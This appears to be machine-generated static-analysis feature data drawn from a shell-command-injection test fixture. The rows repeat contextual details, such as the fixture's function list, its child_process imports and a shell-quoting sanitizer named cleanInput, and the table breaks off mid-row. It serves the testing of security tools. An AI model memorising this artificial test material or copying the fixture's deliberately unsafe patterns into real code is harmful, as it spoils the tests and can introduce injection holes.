autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:15 | s.replace | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | exceptional return of s.repla ... /g, '') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | exceptional return of s.repla ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | exceptional return of s.repla ... /g, '') | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | exceptional return of s.repla ... /g, '') | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | exceptional return of s.repla ... /g, '') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | s.repla ... /g, '') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | s.repla ... /g, '') | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | s.repla ... /g, '') | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | s.repla ... /g, '') | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | s.repla ... /g, '') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:11 | s.repla ... replace | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:11 | s.repla ... replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:11 | s.repla ... replace | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:11 | s.repla ... replace | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:11 | s.repla ... replace | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | exceptional return of s.repla ... "\\\\'") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | exceptional return of s.repla ... "\\\\'") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | exceptional return of s.repla ... "\\\\'") | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | exceptional return of s.repla ... "\\\\'") | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | exceptional return of s.repla ... "\\\\'") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | s.repla ... "\\\\'") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | s.repla ... "\\\\'") | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | s.repla ... "\\\\'") | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | s.repla ... "\\\\'") | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | s.repla ... "\\\\'") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:9:242:15 | replace | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:9:242:15 | replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:9:242:15 | replace | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:9:242:15 | replace | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:9:242:15 | replace | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:17:242:27 | /^(?:'')+/g | CalleeFlexibleAccessPath | s.replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:17:242:27 | /^(?:'')+/g | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:17:242:27 | /^(?:'')+/g | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:17:242:27 | /^(?:'')+/g | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:17:242:27 | /^(?:'')+/g | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:17:242:27 | /^(?:'')+/g | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:17:242:27 | /^(?:'')+/g | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:17:242:27 | /^(?:'')+/g | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:17:242:27 | /^(?:'')+/g | receiverName | s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:30:242:31 | '' | CalleeFlexibleAccessPath | s.replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:30:242:31 | '' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:30:242:31 | '' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:30:242:31 | '' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:30:242:31 | '' | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:30:242:31 | '' | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:30:242:31 | '' | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:30:242:31 | '' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:30:242:31 | '' | receiverName | s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:5:243:11 | replace | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:5:243:11 | replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:5:243:11 | replace | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:5:243:11 | replace | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:5:243:11 | replace | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:13:243:20 | /\\\\'''/g | CalleeFlexibleAccessPath | s.replace().replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:13:243:20 | /\\\\'''/g | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:13:243:20 | /\\\\'''/g | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:13:243:20 | /\\\\'''/g | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:13:243:20 | /\\\\'''/g | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:13:243:20 | /\\\\'''/g | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:13:243:20 | /\\\\'''/g | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:13:243:20 | /\\\\'''/g | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:23:243:27 | "\\\\'" | CalleeFlexibleAccessPath | s.replace().replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:23:243:27 | "\\\\'" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:23:243:27 | "\\\\'" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:23:243:27 | "\\\\'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:23:243:27 | "\\\\'" | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:23:243:27 | "\\\\'" | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:23:243:27 | "\\\\'" | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:243:23:243:27 | "\\\\'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:245:9:245:9 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:245:9:245:9 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:245:9:245:9 | s | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:245:9:245:9 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:245:9:245:9 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:245:9:245:9 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:245:9:245:9 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:245:9:245:9 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:245:9:245:9 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:245:9:245:9 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:248:1:248:6 | module | contextFunctionInterfaces | 